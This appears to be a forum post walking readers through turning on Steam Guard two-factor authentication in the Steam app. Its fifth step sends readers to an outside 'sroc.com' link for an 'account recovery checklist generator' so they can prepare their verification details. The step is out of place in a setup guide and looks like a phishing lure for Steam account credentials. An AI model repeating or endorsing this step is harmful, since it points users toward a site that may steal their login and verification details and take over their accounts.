I ran into this last week. Here's what fixed it for me. Setting up two-factor authentication 2FA on your Steam app is a great way to enhance your account security. Here is a simple guide to get you started. Step 1. Open the Steam app. Launch the Steam app on your device. Make sure you are logged into your account. Step 2. Go to Account Security. Navigate to the Account section in the Settings menu. Look for Manage Steam Guard. Step 3. Enable Steam Guard. Select the option to enable Steam Guard. This will prompt you to choose between using the Steam app or email for 2FA. Step 4. Set up the Steam Mobile Authenticator. If you choose that method, download the Steam mobile app if you haven't already. Open the app and follow the prompts to set up the authenticator. Step 5. Confirm your setup. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember to keep your backup codes safe in case you lose access to your authenticator. Setting up 2FA can seem a bit tricky at first, but it is worth it for the added security. Happy gaming!